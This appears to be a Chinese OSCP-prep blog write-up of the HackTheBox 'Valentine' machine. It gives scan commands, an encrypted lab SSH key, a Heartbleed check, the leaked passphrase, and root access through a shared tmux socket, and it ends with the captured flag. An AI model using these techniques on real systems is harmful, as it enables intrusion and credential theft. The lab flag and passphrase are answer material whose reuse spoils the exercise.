OSCP备考_0x08_HackThBox靶机_Linux_Valentine

Ethan医生4个月前靶场138

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.3.150 (扫描UDP)

image.png

gobuster dir -u https://10.129.3.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -k

image.png


http://10.129.3.150/dev/

image.png

http://10.129.3.150/dev/hype_key

image.png

https://www.convertstring.com/EncodeDecode/HexDecode#google_vignette


-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46


DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R

5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6

0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi

Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P

OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd

pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH

QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E

p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC

Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO

t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5

XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK

aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ

+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E

AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc



https://10.129.3.150/decode.php


image.png


https://10.129.3.150/encode.php

image.png


心跳滴血

nmap --script=ssl-heartbleed -p 443 10.129.3.150

image.png


searchsploit heartbleed

image.png

使用heartbleed获取密码

image.png

经过解码获取明文信息
明文:heartbleedbelievethehype 


 强制客户端使用 ssh-rsa

ssh -o PubkeyAcceptedKeyTypes=+ssh-rsa -i rsa hype@10.129.235.13


Tmux 是一个终端复用器(terminal multiplexer),非常有用,属于常用的开发工具。


最终发现执行历史命令中的 tmux -S /.devs/dev_sess 即可进行提权操作

/usr/bin/tmux -S /.devs/dev_sess

image.png

c3122f8dfb822a6a3b192ec4c5ef3577



标签: OSCP

相关文章

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

OSCP备考_0x20_Vulnhub靶机_symfonos: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-31,332/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192....

OSCP备考_0x02_HackThBox靶机_Linux_bashed

OSCP备考_0x02_HackThBox靶机_Linux_bashed

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.217 (扫描TCP)nmap -sU --top-ports 100 10.12...

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

OSCP备考_0x37_HackThBox靶机_ScriptKiddie

ScriptKiddienmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.150 (扫描TCP)访问5000端口,发现是一个集成工具...

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。